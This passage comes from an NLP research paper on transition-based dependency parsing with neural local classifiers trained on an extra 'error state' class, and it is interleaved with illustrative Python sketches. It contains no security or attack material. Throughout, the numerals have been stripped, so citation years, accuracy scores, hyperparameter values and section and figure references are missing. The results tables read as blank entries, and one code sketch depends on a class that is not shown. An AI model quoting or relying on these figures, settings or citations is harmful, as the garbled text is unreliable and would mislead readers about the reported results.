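    def tag(i):  return tags[i] if i is not None else "<none>"
    s0 = state.stack[-1] if state.stack else None
    s1 = state.stack[-2] if len(state.stack) > 1 else None
    q0 = state.buffer[0] if state.buffer else None
    return {"s0.w": word(s0), "s1.w": word(s1), "q0.w": word(q0),
            "s0.t": tag(s0), "s1.t": tag(s1), "q0.t": tag(q0)}

def gold_examples(tokens, tags, gold_actions):
    """Replay the gold derivation, pairing each state's features with the
    gold action taken from that state. Uses State from the previous sketch."""
    state = State(tokens)
    examples = []
    for action in gold_actions:
        examples.append((extract_features(state, tokens, tags), action))
        state.apply(action)
    return examples
```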
sagae and tsujii ( ) propose using a maximum entropy classifier to pro- duce conditional probabilities for each action given the features of the state, and score each state using the product of the probabilities of all actions taken up to that state. however, they report that searching through the resulting space for the highest scoring parse does not consistently result in improved parser accuracy over a greedy policy (i.e. pursue only the highest scoring action at each state), suggesting that this strategy for scoring states is a poor choice. this is confirmed by zhao et al. ( ), who report only a small improvement over greedy search despite using exact inference with this state scoring strategy. because action probabilities are conditioned on the features of the current state alone and normalized locally, there is no reason to expect that the prod- uct of such probabilities along a derivation path up to a state, whether or not it is a final state, should reflect the overall quality of the state. once an in- correct action is classified as more probable than the correct action in a given state ti, the incorrect state tj resulting from the application of the incorrect ac- tion will have higher score than the correct state tk resulting from the application of the correct action. from that point, the action probabilities given state tj will sum to one, just as the action probabilities given state tk will sum to one, and there is no rea- son to expect that the most probable action from tj should be less probable than the most probable ac- tion from tk. in other words, once an error occurs, search is of little help in recovering from it, since scores are based only on local decisions and not on any notion of state quality, and the error occurred precisely because an incorrect action was found to be more probable locally. our key contribution is a solution to this problem by introducing a notion of state quality in local ac- tion classification. this is done through the addi- tion of a new error class to the local classification model. unlike the other classes, the error class does not correspond to a parser action. in fact, the error class is not used at all during parsing, and serves to occupy probability mass, keeping it from the actual parser actions. intuitively, the probability of the er- ror class given the current state can be thought of as the probability that an error has occurred previ- ously and the resulting state belongs to an incorrect derivation path. . training local classifiers with error states to train a local classifier with error states, the stan- dard way of generating classifier training examples is modified to include parser states that do not be- long to the derivation of the gold-standard tree. it is these incorrect parser states that are labeled error states. figure illustrates the generation of train- ing examples for a local action classifier with error states, assuming unlabeled arc-standard dependency parsing (nivre, ), where the actions are shift, reduce-right and reduce-left. from state , the stan- dard way of training local classifiers would be sim- ply to associate features from state to a shift action, generate state (only), associate features from state with a shift action, generate state , and continue in this fashion along the derivation of the gold-standard tree. to add error states, from state we do not only generate state , but also states and , which result from the application of incorrect actions. 
in addition to associating features from state with shift, we associate features from state with the error class, and features from state with the error class. the desired effect is that any time the parser deviates from a correct derivation, the error class should be- come probable, while valid parser actions become less probable. although in principle any state out- side of a gold-standard derivation is an error state, we generate only error states resulting from the ap- plication of a single incorrect action, which in prac- tice increases the number of state-action pairs used to train the classifier by approximately a factor of three. we leave an investigation of how far into in- correct derivations one should go to generate addi- tional error states as future work. . parsing with error states once a local classifier has been trained with error states, this classifier can be used in a transition- based parser with no modifications; the error class is simply thrown away during parsing. for example, the type of beam search typically used in transition- based parsing with the structured perceptron (zhang and clark, ; huang and sagae, ) can be used to pursue several derivations in parallel, and global score of a derivation can be decomposed as the sum of the scores of all actions in the deriva- sh sh s=[] q=[eat, pasta, with, sauce] s=[eat] q=[pasta, with, sauce] s=[eat, pasta] q=[with, sauce] r l sh s=[eat] q=[with, sauce] s=[pasta] q=[with, sauce] err err sh r l s=[eat, pasta, with] q=[sauce] figure : training of a local classifier for parser actions with error states. in addition to collecting training exam- ples for each of the three valid parser actions (represented as sh for shift, l for reduce-left, and r for reduce-right), we collect also examples of an error class (err), which corresponds to the shaded states generated after taking an incorrect action. tion. analogously, we score each derivation using the product of the probabilities for all actions in the derivation. interestingly, local normalization of ac- tion scores allows the use of best-first search (sagae and tsujii, ), which has the potential to arrive at high quality solutions without having to explore as many states as a typical beam search, and even al- lows efficient exact or nearly exact inference (zhao et al., ). once actions are scored for the parser’s current state using a classifier, the score of a new state resulting from the application of a valid action to the current state can be computed as the product of the probabilities of all actions applied up to the new state in its derivation path. in other words, the score of each new state is the score of the current state multiplied by the probability of the action ap- plied to the current state to generate the new state. new scored states resulting from the application of each action to the current state are then placed in a priority queue. the highest scoring item in the pri- ority queue is chosen, and the state corresponding to that item is then made the current state . the lo- cal classifier is then applied to the current state, and for efficiency, items inserted in the priority queue could be simply state scores coupled with the corresponding action and a pointer to the current state, since the new state only needs to be generated once it becomes the current state, and often only a fraction of priority queue items ever become current states. sh: . sh: . p= . s=[] q=[eat, pasta, with, sauce] p= . s=[eat] q=[pasta, with, sauce] p= . 
s=[eat, pasta] q=[with, sauce] p= . r: . l: . p= . s=[eat] q=[with, sauce] p= . s=[eat, pasta, with] q=[sauce] sh: . sh: . r: . l: . p= . p= . sh: . r: . p= . s=[eat, pasta, with, sauce] q=[] … p= . p= . l: . p= . p= . sh: . figure : exploration of parser state space using best-first search and error states. states are numbered according to the order in which they become the parser’s current state. the local action classifier is trained with four classes: the three valid actions (represented as sh for shift, l for reduce-left, and r for reduce-right) and an error class. the error class is not used by the parser and not shown in the diagram, but serves to reduce the total probability of valid parser actions by occupying some probability mass in each state, creating a way to reflect the overall quality of individual states. the process is repeated (without clearing the prior- ity queue, which already contains items correspond- ing to unexplored new states) until the current state is a final state (a state corresponding to a complete parse). this agenda-driven transition-based parsing approach, where the agenda is a priority queue, is optimal since all scores fall between and , inclu- sive, but in practice a priority queue with limited ca- pacity can be used to improve efficiency by prevent- ing unbounded exploration of the exponential search space in cases where probabilities are nearly uni- form. figure illustrates arc-standard dependency parsing with error states and best-first search. from states and , the only possible action is shift. from state , the most probably action according to the model is reduce-left, which is not the correct action, but has probability . . the correct action, shift, has probability . . state is then chosen as the cur- rent state, but when the classifier is applied to state , the only valid action, shift, is assigned probabil- ity . . this is because the classifier assigns most of the probability mass to the error class, which the parser does not use. because the state resulting from a shift from state would have low probability, due to the low probability of shift, the search continues from state , and the parser has recovered from the classification error at state . in the next section, we will present details of our neural network local classifiers. neural models for transition based parsing we implement transition-based parsers with error states following two search strategies: the step- wise beam search normally used in transition-based parsers with global models (zhang and clark, ; huang and sagae, ) and best-first search (sagae and tsujii, ; zhao et al., ), described in the previous section. the trainable components of our transition-based parsers are the local classi- fiers that predict the next action given features de- rived from the current state. following chen and manning ( ), we train feed-forward neural net- works (nns) for local classification in our parsers. the nn is trained on pairs of features and actions, {fn,an}nn= , where fn is the feature vector extracted from the parser state and an is the corresponding correct action. for vanilla arc-standard parsing, an is one of {shift, reduce-left, reduce-right}, and for parsing with error states, an additional error action. 
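a sketch of how such training pairs can be generated with error states, following the procedure described in the previous section: from each state on the gold derivation, every incorrect legal action is applied once and the resulting state is labeled with the error class. it builds on the State class and extract_features function from the earlier sketches; the "err" label and helper names are illustrative.

```python
# Gold-derivation example generation extended with error states: states
# reached by one incorrect action are labeled with a special error class.

import copy

ERROR = "err"

def examples_with_error_states(tokens, tags, gold_actions):
    state = State(tokens)
    examples = []
    for gold in gold_actions:
        # Features of the correct state, labeled with the gold action.
        examples.append((extract_features(state, tokens, tags), gold))
        # One-step deviations: apply each incorrect legal action and label
        # the features of the resulting (incorrect) state with ERROR.
        for action in state.legal_actions():
            if action == gold:
                continue
            wrong = copy.deepcopy(state)
            wrong.apply(action)
            examples.append((extract_features(wrong, tokens, tags), ERROR))
        state.apply(gold)
    return examples
```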
[figure: basic architecture of our nn models]

while parsing, we extract feature vector f from the current state and make a decision based on the output distribution, p(a | f), computed by the nn. we will now describe the basic architecture of our nn classifier and the features that we use. we will also describe how we pre-train embeddings from unannotated data for our word features.

. neural network model

figure shows the basic architecture of our neural network action prediction model for two input features f = f_1, f_2, each of which is a one-hot vector with dimension equal to the number of possible feature types. the neural network has two hidden layers, and the output softmax layer has the same number of units as the number of parser actions, that is, either three (without error states) or four (with error states). d is the input embedding matrix that is shared by all the input feature positions. each feature position f_i has a corresponding position matrix c_{f_i}. the two hidden layers h_1 and h_2 comprise rectified linear units (nair and hinton, ) having the activation max(0, x) (figure ).

[figure: activation function for a rectified linear unit]

the neural network computes the probability distribution over the parser actions, p(a | f), as follows. the first hidden layer computes

h_1 = \phi\big( \sum_{f_i} c_{f_i} d f_i + b_1 \big),

where b_1 is a vector of biases for h_1 and \phi is applied elementwise. the output of the second layer h_2 is

h_2 = \phi( m h_1 + b_2 ),

where m is a weight matrix between h_1 and h_2 and b_2 is a vector of biases for h_2. the output softmax layer computes the probability of an action as

p(a | f) = \frac{ \exp( v_a d' h_2 + b^\top v_a ) }{ \sum_{a'} \exp( v_{a'} d' h_2 + b^\top v_{a'} ) },

where d' is the matrix of output action embeddings, b is a vector of action biases, and v_a is the one-hot representation of the action a. we learn models that predict over two types of output distributions conditioned on f: vanilla arc-standard models that predict over shift, reduce-left and reduce-right, and arc-standard models with error states (section ) that predict over shift, reduce-left, reduce-right and error.

. semi-supervised learning: pre-training word embeddings

it is often the case that large amounts of domain-specific unannotated data, i.e. raw text, are available in addition to annotated data. for both graph-based and transition-based parsing, many feature templates are defined on words from the input sentence. previous work has shown benefits of using word representations learned from unannotated data. koo et al. ( ) achieve significant improvement in dependency parsing on the penn treebank (ptb) (from . % to . %) by using brown clusters (brown et al., ) learned from the bllip corpus (charniak et al., ). chen and manning ( ) also show . % improvement on english dependency parsing on ptb using pre-trained english word embeddings from collobert et al. ( ). we also seek to benefit from pre-trained embeddings to initialize the input feature embeddings, d (figure ), in our neural network classifiers. following both koo et al. ( ) and chen and manning ( ), we learn word embeddings by training a feed-forward neural network language model on a concatenation of the bllip corpus and sections – of the ptb corpus. we use the nplm toolkit (http://nlg.isi.edu/software/nplm/), which implements noise contrastive estimation training of a two-hidden-layer feed-forward neural network language model with rectified linear units (vaswani et al., ).
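the forward computation just described can be summarized in a small numpy sketch; all dimensions below are illustrative placeholders, since the concrete sizes are not reproduced in this text.

```python
# Forward pass of the action classifier described above: shared input
# embeddings d, one position matrix per feature position, two ReLU hidden
# layers, and a softmax over parser actions. Dimensions are illustrative.

import numpy as np

rng = np.random.default_rng(0)
V, E, H1, H2, A, P = 1000, 50, 200, 200, 4, 6   # vocab, embedding, hidden sizes, actions, feature positions

d  = rng.normal(scale=0.1, size=(E, V))                         # shared input embedding matrix
c  = [rng.normal(scale=0.1, size=(H1, E)) for _ in range(P)]    # per-position matrices c_{f_i}
b1 = np.zeros(H1)
m  = rng.normal(scale=0.1, size=(H2, H1))                       # weights between h_1 and h_2
b2 = np.zeros(H2)
dp = rng.normal(scale=0.1, size=(A, H2))                        # output action embeddings d'
ba = np.zeros(A)                                                # action biases

def relu(x):
    return np.maximum(0.0, x)

def action_distribution(feature_ids):
    """feature_ids: one vocabulary index per feature position (length P).
    Returns p(a | f) over the parser actions."""
    h1 = relu(sum(c[i] @ d[:, f] for i, f in enumerate(feature_ids)) + b1)
    h2 = relu(m @ h1 + b2)
    logits = dp @ h2 + ba
    logits -= logits.max()               # numerical stability for the softmax
    p = np.exp(logits)
    return p / p.sum()

if __name__ == "__main__":
    print(action_distribution(rng.integers(0, V, size=P)))
```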
we train a -gram neu- ral language model with input word embedding di- mension , units in the first hidden layer, units in the second hidden layer and output word- embedding dimension of . the neural language model is trained for epochs using stochastic gra- dient descent and an initial learning rate of . . we restrict the vocabulary to about k most-frequent words, replacing all the other words with <unk>. we use a validation set of about k n-grams and extract the input word embeddings from the epoch that achieves the lowest perplexity on the validation set. to avoid over-fitting, in our dependency parsing experiments, we only use pre-trained embeddings for the words that occurred at least twice in sections – of the ptb corpus. pre-trained embeddings give us significant improvements over randomly ini- tialized embeddings, as our results will show (sec- tion ). . training we train six different types of nn classifiers for transition-based dependency parsing: one for each search algorithm with error states, with and with- out pre-trained word embeddings, in addition to two models with no error states, as described below. . . vanilla arc-standard parsers we train nn classifiers for arc-standard transition- based parsers that compute probability distributions over shift, reduce-left, and reduce-right, using the kernel features described by huang and sagae ( ), shown in table . we trained models us- ing both pre-trained (section . ) and randomly ini- tialized word embeddings. we denote these parsers as local– –pre and local– –rand. these mod- els allow us to compare the use of nn classification word features s .w s .w s .w q .w q .w pos tag features s .t s .t s .t q .t q .t child features s .lc.t s .rc.t s .lc.t s .rc.t table : the feature templates used in some of our models. s and q indicate the stack and the input buffer respectively, subscripts start at zero on the top of the stack or in the front of the input buffer. fi- nally, lc and rc indicate the leftmost left child and the rightmost right child, respectively. without error states directly with the structured per- ceptron, and examine the impact of pre-trained word embeddings. . . error state parsers we also train nn classifiers that differ from the ones above only in the use of error states: errst– –pre (error states, pre-trained embeddings), and errst– –rand (error states, randomly initialized embed- dings). these allow us to examine the impact of using error states, and give us a way to compare our approach with nn and error states directly with an existing structured perceptron arc-standard parser (huang and sagae, ) using the same kernel features and the same search approach. the dif- ferences in the two approaches are that huang and sagae ( ) use the structured perceptron and an extended set of features based on the kernel features, and we use nn with error states and only the ker- nel features. additionally, we train two classifiers that use a more expressive expanded set of features, which we use with best-first search (sagae and tsujii, ; zhao et al., ) with error states: errst– –pre (expanded feature set, error states, pre-trained embeddings), and errst– –rand (ex- panded feature set, error states, randomly initial- ized embeddings). the feature templates used by these classifiers are shown in table . in con- trast, chen and manning ( ) use feature tem- plates, including higher-order dependency informa- tion than has been shown to improve parsing ac- curacy significantly (zhang and nivre, ). 
it is likely that our approach would benefit similarly from the use of these features, but we leave the ad- dition of features as future work. finally, for each of six types of classifiers above, word s .w s .w s .w q .w q .w q .w q .w pos tag features s .t s .t s .t q .t q .t q .t q .t word child features s .lc.w s .rc.w s .lc.w s .rc.w pos child features s .lc.t s .rc.t s .lc.t s .rc.t previous action previous action distance dist(s ,s ) dist(q ,s ) table : the expanded set of feature templates used in some of our models. s and q indicate the stack and the input buffer respectively, subscripts start at zero on the top of the stack or in the front of the input buffer. lc and rc indicate the leftmost left child and the rightmost right child, respectively. dist(a,b) is the signed distance between the root of a and the root of b in the input sentence, and previous action is the action that was applied to generate the current state. we train models using both stanford dependen- cies (de marneffe and manning, ) and ya- mada and matsumoto (ym) dependencies (yamada and matsumoto, ) extracted from the penn treebank. we create {fntrain,antrain} ntrain n= pairs on wall street journal sections – , and use {fndev,andev} ndev n= pairs from section as a develop- ment set, where ntrain and ndev are the number of training and dev instances. we obtain part-of-speech tags by training a crf tagger on sections – with -way jackknifing, which achieves a tagging accu- racy of . % on section . we train our nn clas- sifiers to maximize the log-likelihood of the correct actions given features, n ntrain∑ n= log p(antrain | fntrain). we use mini-batch dropout training, computing gra- dients using the back-propagation algorithm (hinton et al., ). we use the development set to tune the learning rate, halving it if the perplexity on the de- velopment set increases. . model and parser selection for each of our nn classifiers, there are a few tun- able hyper-parameters: hidden layer size (h ), mini- batch size, initial learning rate lr, dropout probabil- ities for h and h (dh , and dh ) , and random ini- tialization of parameters. we tuned each of these to maximize classification accuracy of the most likely action predicted by the classifier given the feature vector. we calculated classification accuracy as ∑ndev n= δ(arg maxa p(a | fndev),andev) ndev , where δ(x,y) returns if x equals y and otherwise. for each of the classifiers, we first tuned lr, mini-batch size, h size, and dh and dh for accuracy. we tried lr = { . , . , . }, h = { , , , }, mini-batch size = { , , }, dh = { . , . , . }, and dh = { . , . , . }. for all our randomly initialized classifiers (local– –rand, errst– –rand, and errst– –rand), we chose the model that achieved the best classification accuracy on the development set for parsing the test set. we also used the same random seed to initialize our parameters. for local– –pre, errst– –pre, and errst– –pre, we trained models with different random initializa- tions of the input embeddings (d in figure ) that were not pre-trained. for each random initializa- tion, we chose the model with the best classifica- tion accuracy on the development set. to pick the fi- nal model for parsing on test, we selected the model to maximize parsing accuracy on the development set. we computed our parsing accuracies using the eval .pl script from the conll shared task on dependency parsing (nivre et al., ), ignoring punctuation as is standard in english dependency parsing evaluation. 
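a compact sketch of the training schedule and the classification-accuracy criterion described above; train_one_epoch, dev_perplexity and action_probs are hypothetical stand-ins for the actual model code and are not defined in the original text.

```python
# Sketch of the training schedule: minibatch SGD on the action classifier,
# halving the learning rate whenever the development perplexity increases.

def classification_accuracy(model, dev_examples):
    """Fraction of dev states whose most probable predicted action equals
    the reference action."""
    correct = 0
    for f, a in dev_examples:
        probs = model.action_probs(f)          # hypothetical: dict action -> probability
        if max(probs, key=probs.get) == a:
            correct += 1
    return correct / len(dev_examples)

def train(model, train_examples, dev_examples, lr=0.05, epochs=20, batch_size=32):
    best_perplexity = float("inf")
    for epoch in range(epochs):
        model.train_one_epoch(train_examples, lr=lr, batch_size=batch_size)  # hypothetical
        ppl = model.dev_perplexity(dev_examples)                             # hypothetical
        if ppl > best_perplexity:
            lr *= 0.5                          # halve the learning rate when dev perplexity rises
        else:
            best_perplexity = ppl
        acc = classification_accuracy(model, dev_examples)
        print(f"epoch {epoch}: dev perplexity {ppl:.2f}, classification accuracy {acc:.3f}")
    return model
```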
for both ym and stanford dependencies, the optimal values of h were for errst– –pre and errst– –rand, and either , or for local– –pre, local– –rand, errst– –pre, and errst– –rand. for the best parser on stanford and ym dependencies (errst– –pre), we used a minibatch size of and an initial learning rate of . . for future work, we will explore a larger grid of learning rate, minibatch sizes, and dropout values. at parsing time, we pre-multiply the input embeddings d and the position matrices c_{f_i}, which speeds up computation significantly.

results

in all experiments we use dependencies extracted from the penn treebank (marcus et al., ) following the standard splits (wsj sections to for training, for development and for testing), and part-of-speech tags assigned automatically using four-way jackknifing.

  system               | uas
  local– –pre (beam )  | .
  local– –pre (beam )  | . (+ . )
  errst– –pre (beam )  | .
  errst– –pre (beam )  | . (+ . )
  errst– –pre          | .

table : unlabeled accuracy scores (uas) on the development set with stanford dependencies using transition-based models trained with pre-trained embeddings. errst– –pre uses best-first search with a priority queue of size limited to .

  system                | uas
  local– –rand (beam )  | .
  local– –rand (beam )  | . (+ . )
  errst– –rand (beam )  | .
  errst– –rand (beam )  | . (+ . )
  errst– –rand          | .

table : unlabeled accuracy scores (uas) on the development set with stanford dependencies using models trained without pre-trained embeddings. errst– –rand uses best-first search with a priority queue of size limited to .

tables and present results obtained on the development set with our models trained with and without pre-trained word embeddings. our baseline arc-standard parser using greedy search (local– –pre beam ) is as accurate as the best nn dependency parser of chen and manning ( ), where both use pre-trained embeddings. in both tables, we can see that increasing the beam size from (greedy parsing) to gives only very modest improvements in accuracy when trained without error states (local– –pre and local– –rand). as mentioned in section . , using beam search with vanilla arc-standard parsing with locally normalized models does not produce large improvements over greedy search due to the label bias problem. for both pre-trained and randomly initialized word embeddings, beam search with models trained with error states improves accuracy substantially (errst– –pre and errst– –rand).

[figure: effect of beam size on accuracy, using stanford dependencies and models trained with pre-trained embeddings]

[figure: effect of beam size on accuracy, using stanford dependencies and models trained without pre-trained embeddings]

our best parsers use pre-trained embeddings, best-first search, and a larger feature set (errst– –pre). in table , we isolate the efficacy of training and search with error states. even with randomly initialized embeddings, we are able to outperform chen and manning’s nn dependency parser initialized with embeddings from external sources. our results show that using error states in parsing can improve parsing accuracy independently of whether beam search or best-first search is used.
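for reference, the unlabeled attachment score reported in these tables can be computed as follows; the punctuation tag set shown is only a typical choice for english evaluation, not necessarily the exact set used by the eval.pl script.

```python
# Unlabeled attachment score (UAS): the fraction of non-punctuation tokens
# whose predicted head matches the gold head.

PUNCT_TAGS = {",", ".", ":", "``", "''"}   # typical PTB punctuation tags (illustrative)

def uas(pred_heads, gold_heads, tags):
    """pred_heads / gold_heads: dicts mapping token index -> head index;
    tags: list of part-of-speech tags for the sentence."""
    scored = [i for i in gold_heads if tags[i] not in PUNCT_TAGS]
    correct = sum(1 for i in scored if pred_heads.get(i) == gold_heads[i])
    return correct / len(scored) if scored else 0.0
```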
figures and show comparisons of the effects of increasing beam sizes in models trained with and without error states. we additionally show that the benefits of using error states are not limited to classification with neural networks. figure shows the results obtained on the development set with an arc-standard beam-search parser using maximum entropy classification with l regularization and the full set of features used by huang and sagae ( ), and increasing beam sizes. (we used yoshimasa tsuruoka’s maximum entropy library, downloaded from http://www.logos.ic.i.u-tokyo.ac.jp/~tsuruoka/maxent/.) the improvement obtained from beam-search with baseline local classification is limited as expected, while the improvement obtained from beam-search with error states is substantially more pronounced. although the accuracy levels obtained with maximum entropy classification are clearly lower than those obtained with our neural network models, these results do confirm that error states are effective with linear classification.

[figure: unlabeled accuracy scores (uas) obtained using maximum entropy models for local classification of parser actions with and without error states using various beam sizes]

in table , we compare our best parsers with and without pre-trained word embeddings, errst– –pre and errst– –rand, against other published results. on stanford dependencies, our parser with pre-trained embeddings performs comparably with the state-of-the-art. by using search with error states, we outperform a greedy nn parser (chen and manning, ) by a wide margin. on ym dependencies, our performance (errst– –pre) is comparable to that of a structured perceptron second-order graph-based parser using carefully selected features based on brown clustering of the bllip corpus (koo et al., ). our randomly initialized parser (no pre-trained embeddings), errst– –rand, performs at a similar level to a structured perceptron transition-based parser (huang and sagae, ), but below that of parsers with finely tuned higher-order rich feature sets (zhang and nivre, ). while we leave the use of zhang and nivre’s rich feature set as future work, for a direct comparison of nn models with error states and structured perceptron for transition-based dependency parsing, we additionally tested a parser (errst– –rand) that uses the exact same beam search and kernel features used by huang and sagae ( ). with nn and error states, we obtained . % accuracy, compared to huang and sagae’s . %.

  system               | wsj -s | wsj -ym
  errst– –rand         | .      | .
  errst– –pre*         | .      | .
  chen & manning*      | .      | –
  huang & sagae        | –      | .
  zhang & nivre        | .      | .
  weiss et al.*        | .      | –
  zhang & mcdonald     | .      | .
  martins et al.       | .      | .
  koo et al. (dep c)*  | –      | .

table : unlabeled accuracy scores (uas) on stanford dependencies (s) and yamada & matsumoto dependencies (ym) extracted from wsj section for our best transition-based parsers with error states, with and without pre-trained word embeddings. for comparison, we also include results from other transition-based approaches (chen and manning, ; huang and sagae, ; zhang and nivre, ; weiss et al., ) and graph-based approaches (zhang and mcdonald, ; martins et al., ; koo et al., ). *these parsers use large sets of unlabeled data.
an advantage of our approach is that we use the kernel features only, which come from the templates shown in table , while huang and sagae use additionally an extended set of features composed of carefully tuned concatenation templates involving the kernel features. the parsing speed of our parser imple- mentation using our best model, errst– –pre, is approximately , tokens (or sentences) a sec- ond. of course, such a measurement of speed is de- pendent on a variety of factors, such as hardware and programming language of the specific implementa- tion, among others, so this figure observed in our experiments serves only as an illustrative sample. related work our work builds on the transition-based parsing work described in section , where local classifiers are trained to predict parser actions (nivre, ), but provides a way to go beyond deterministic pars- ing. one way to create models capable of global scoring, and therefore effective search, is to parse with the structured perceptron (zhang and clark, ), which we also discuss in section . instead of performing global weight updates, our approach re- lies on local classifiers, but adds information about incorrect derivation paths to approximate a notion of global loss. this gives us a simple way to train neural network models for predicting parser actions locally but still perform effective search. our use of error states is conceptually related to the correctness probability estimate proposed by yazdani and henderson ( ), which is used only with each shift action of an arc-eager transition- based parsing model. this correctness probability creates a measure of quality of derivations at the point of each shift, which allows a combination of local action scores and the correctness probability to be used with beam search. the beam is then de- termined only at each shift, while search paths pro- duced by other actions are extended exhaustively. our error states, in contrast, adjust the scores of ev- ery action, making the use of best-first search natu- ral. non-deterministic oracles for transition-based de- pendency parsing (goldberg and nivre, ; gold- berg and nivre, ) are also designed to improve the performance of parsers that use local classifica- tion of actions by adding to the amount of infor- mation used to train the local classifiers. however, non-deterministic oracles aim to allow a determin- istic parser to recover from incorrect actions by in- cluding information in the training of the local clas- sifiers based on the notion that there may be several correct actions at a given point, as long as a desired tree remains reachable. in contrast, our local classi- fier, or oracle, is trained to encode a notion of state quality or approximate global loss that is specifi- cally designed for search. in fact, when used with greedy search, our error states have no positive ef- fect on parsing. this suggests that a combination of the benefits of non-deterministic oracles and error states may be possible. our training of local classifiers with error states shares with searn (daumé iii et al., ) and dagger (ross et al., ) the idea of creating a notion of global loss in local scores, but searn and dagger learn to estimate the quality of search states by iteratively training policies using the entire training set, while we train only one policy, but us- ing explicit information about states outside of the optimal path. 
choi and palmer ( ) show that the idea of iter- atively refining policies in a very similar way as pro- posed in searn and dagger can in fact be applied to transition-based dependency parsing to improve accuracy of deterministic parsing. by creating train- ing examples for local classifiers based on parser states that are likely to occur at run time, but would not be generated with the gold-standard derivation, local classification models can be trained to be more robust in recovery from past errors. a key difference is that this provides a way for the parser to do better assuming that a mistake has already been made and is irrevocable, while our error states are designed to improve search, lowering the score of undesirable paths so a different path is chosen. our greedy neural network parser is similar to chen and manning ( ), who are the first to show the benefits of using feed-forward neural net- work classifiers in greedy transition-based depen- dency parsing. unlike us, they use a single hidden layer of cube activation functions, and more fea- tures. we follow the neural network architecture of vaswani et al. ( ), using two hidden layers of rectified linear units. chen and manning ( ) use adagrad (duchi et al., ) and dropout for optimization, while we use stochastic gradient de- scent with dropout. recent work by weiss et al. ( ) produces the highest published accuracy for english dependency parsing with very similar neu- ral network architectures and similar pre-training of word embeddings. the accuracy of the greedy ver- sion of their parser is substantially higher than that of our greedy parser, due at least in part to the use of more features. a more interesting difference be- tween their approach and ours is in the way struc- tured prediction is performed. while weiss et al. add a structured perceptron layer to a network pre- trained locally, we train only locally, but using error states. both approaches are effective in producing improvements over the respective greedy baselines, and a direct comparison using the same greedy base- line is left for future work. conclusion we presented a new approach for approximate struc- tured inference for transition-based parsing that al- lows us to obtain high parsing accuracy using neural networks. using error states, we improved search by producing scores suitable for global scoring us- ing only local models, and showed that our ap- proach is competitive with the structured percep- tron in transition-based parsing. additionally, our approach provides a straightforward way to take advantage of word embeddings in transition-based parsing, which produce high accuracy for transition- based dependency parsing in english, rivaling that of higher-order graph-based parsers. source code, models and word embeddings for our transition- based dependency parser with error states are avail- able at http://github.com/sagae/nndep. our approach for using error states to improve search is quite general, and could be applied to other structured problems that can be approximated us- ing local models, such as sequence labeling and transition-based parsing with recurrent neural net- works. an area of future work is the application of error state training in problems where the local classifier has a high number of classes, as is often the case in labeled dependency parsing. a straightforward application of our approach roughly multiplies the number of training examples for the local classifier by the number of possible classes. 
for example, in labeled dependency parsing, where dependency la- bels are typically concatenated to actions, the num- ber of classes is often greater than , which would increase the number of training examples more than -fold. preventing such an increase in the number of training examples may be possible by factoring the problem in such a way that structure-building decisions are treated separately from labeling de- cisions (in labeled dependency parsing this would amount to training an arc labeling classifier sepa- rately), or perhaps more generally, by sampling from the possible error states. acknowledgments we thank the anonymous reviewers for their numer- ous insightful suggestions. the work described here has been sponsored by the u.s. army under con- tract number w nf- -d- and aro grant w nf- - - . any opinions, content or in- formation presented does not necessarily reflect the position or the policy of the united states gov- ernment, and no official endorsement should be in- ferred. references peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . eugene charniak, don blaheta, niyu ge, keith hall, john hale, and mark johnson. . bllip - wsj corpus release . linguistic data consortium, philadelphia, . danqi chen and christopher d. manning. . a fast and accurate dependency parser using neural net- works. in proceedings of empirical methods in natu- ral language processing., pages – . jinho d. choi and martha palmer. . getting the most out of transition-based dependency parsing. in proceedings of the association for computational lin- guistics., hlt ’ , pages – , stroudsburg, pa, usa. proceeding of the association for computa- tional linguistics. michael collins and brian roark. . incremental parsing with the perceptron algorithm. in proceed- ings of the association for computational linguis- tics., acl ’ , stroudsburg, pa, usa. association for computational linguistics. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the empirical methods in natural language process- ing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. the journal of machine learning research, : – . hal daumé iii, john langford, and daniel marcu. . search-based structured prediction. journal of ma- chine learning research., ( ): – , june. marie-catherine de marneffe and christopher d. man- ning. . the stanford typed dependencies repre- sentation. in coling : proceedings of the work- shop on cross-framework and cross-domain parser evaluation, pages – , manchester, uk, august. col- ing organizing committee. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research, : – . yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of the international conference on computational lin- guistics., pages – . the coling organiz- ing committee. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association of computational lin- guistics, pages – . 
jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint approach to word segmentation, pos tagging, and dependency parsing in chinese. in proceedings of the association for computational linguistics, acl ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. geoffrey e. hinton, nitish srivastava, alex krizhevsky, ilya sutskever, and ruslan r. salakhutdinov. . improving neural networks by preventing co-adaptation of feature detectors. arxiv preprint arxiv: . . matthew honnibal, yoav goldberg, and mark johnson. . a non-monotonic arc-eager transition system for dependency parsing. in proceedings of the sev- enteenth conference on computational natural lan- guage learning, pages – . proceedings of the association for computational linguistics. liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in proceed- ings of the association for computational linguistics., acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. liang huang, suphan fayong, and yang guo. . structured perceptron with inexact search. in proceed- ings of the conference of the north american chap- ter of the association for computational linguistics., naacl hlt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. richard johansson and pierre nugues. . investi- gating multilingual dependency parsing. in proceed- ings of the tenth conference on computational nat- ural language learning, conll-x ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of the association for computational lin- guistics, pages – . association for computa- tional linguistics. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: proba- bilistic models for segmenting and labeling sequence data. in proceedings of the international conference on machine learning, icml ’ , pages – , san francisco, ca, usa. morgan kaufmann publishers inc. mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics., ( ): – , june. andré f. t. martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in proceeding of the as- sociation for computational 